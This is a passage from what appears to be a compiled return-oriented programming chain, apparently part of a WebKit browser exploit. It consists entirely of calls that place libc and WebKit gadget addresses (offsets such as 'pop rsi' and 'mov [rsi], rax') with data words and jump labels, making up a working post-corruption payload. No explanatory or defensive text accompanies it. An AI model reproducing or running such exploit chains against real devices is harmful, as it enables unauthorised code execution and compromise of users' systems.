libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3679:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3680:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3681:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+214232, //L3683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3683:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+214288, //L3684
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3684:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+214424, //L3688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+214408, //L3687
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3686:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3687:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3688:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+214512, //L3689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+214544, //L3691
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3689:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3690:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3691:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+214616, //L3692
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3692:
db([0, 0]); // 0x0
//L3661:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+214744, //L3695
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+214760, //L3696
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+214728, //L3694
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3694:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3695:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3696:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+214920, //L3701
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+214936, //L3702
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+214872, //L3698
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3698:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3699:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3700:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3701:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3702:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+215048, //L3703+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+215040, //L3703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3703:
db([0, 0]); // 0x0
set_gadgets([
ropchain+215064, //L3703+24
ropchain+217960, //L3697
libc_base+764760, //pop rsi
ropchain+215104, //L3704
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3704:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3706:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+215224, //L3709
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+215208, //L3707
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3707:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3709:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+215384, //L3713
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+215352, //L3711
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+215368, //L3712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3710:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3711:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3712:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3713:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+215440, //L3715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3715:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+215568, //L3717
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+215584, //L3718
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+215552, //L3716
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3716:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3717:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3718:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+215744, //L3722
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+215712, //L3720
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+215728, //L3721
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3719:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3720:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3721:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3722:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+215800, //L3724
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3724:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+215928, //L3726
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+215944, //L3727
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+215912, //L3725
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3725:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3726:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3727:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+216104, //L3732
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+216120, //L3733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+216056, //L3729
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3729:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3730:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3731:
db([1, 0]); // 0x1
set_gadget(webkit_base+3236123,); //pop r9
//L3732:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3733:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+216240, //L3734+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+216232, //L3734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3734:
db([0, 0]); // 0x0
set_gadgets([
ropchain+216256, //L3734+24
ropchain+217584, //L3728
libc_base+764760, //pop rsi
ropchain+216296, //L3735
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3735:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3737:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+216416, //L3740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+216400, //L3738
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3738:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3740:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+216592, //L3743
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+216608, //L3744
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+216560, //L3741
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+216576, //L3742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3741:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3742:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3743:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3744:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+216704, //L3746
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+216688, //L3745
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3745:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3746:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3747:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3748:
db([2, 0]); // 0x2
set_gadget(libc_base+763368,); //pop rcx
//L3749:
db([2, 0]); // 0x2
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3750:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3751:
db([3, 0]); // 0x3
set_gadget(libc_base+763368,); //pop rcx
//L3752:
db([3, 0]); // 0x3
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+217056, //L3754
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3754:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+217112, //L3755
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3755:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+217192, //L3758
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3758:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+217248, //L3759
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3759:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+217384, //L3763
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+217368, //L3762
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3761:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3762:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3763:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+217472, //L3764
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+217504, //L3766
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3764:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3765:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3766:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+217576, //L3767
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3767:
db([0, 0]); // 0x0
//L3728:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+217704, //L3770
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+217720, //L3771
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+217688, //L3769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3769:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3770:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3771:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+217864, //L3774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+217880, //L3775
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+217832, //L3772
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3772:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3773:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3774:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3775:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+217952, //L3776
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3776:
db([0, 0]); // 0x0
//L3697:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+218080, //L3779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+218096, //L3780
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+218064, //L3778
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3778:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3779:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3780:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+218208, //L3782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+218256, //L3785
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+218224, //L3783
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3782:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3783:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3784:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3785:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+218368, //L3786+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+218360, //L3786
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3786:
db([0, 0]); // 0x0
set_gadgets([
ropchain+218384, //L3786+24
ropchain+219096, //L3781
libc_base+764760, //pop rsi
ropchain+218424, //L3787
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3787:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3789:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+218544, //L3792
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+218528, //L3790
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3790:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3792:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+218720, //L3795
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+218736, //L3796
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+218688, //L3793
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+218704, //L3794
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3793:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3794:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3795:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3796:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+218832, //L3798
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+218816, //L3797
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3797:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3798:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+218920, //L3800
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L3799:
db([4294967295, 4294967295]); // -0x1
set_gadget(libc_base+759608,); //pop rax
//L3800:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+218976, //L3801
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3801:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3803:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+219056, //L3805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3805:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L3781:
//L3806:
libc_base+764760, //pop rsi
ropchain+219136, //L3807
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3807:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3809:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+219256, //L3812
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+219240, //L3810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3810:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3812:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+219400, //L3815
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+219368, //L3813
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+219384, //L3814
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3813:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3814:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3815:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+219480, //L3816
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3816:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3818:
db([80, 0]); // 0x50
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+219600, //L3821
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+219584, //L3819
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3819:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3821:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+219776, //L3824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+219792, //L3825
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+219744, //L3822
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+219760, //L3823
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3822:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3823:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3824:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3825:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+219952, //L3829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+219920, //L3827
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+219936, //L3828
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3826:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3827:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3828:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3829:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+220040, //L3830
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+220056, //L3831
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3830:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3831:
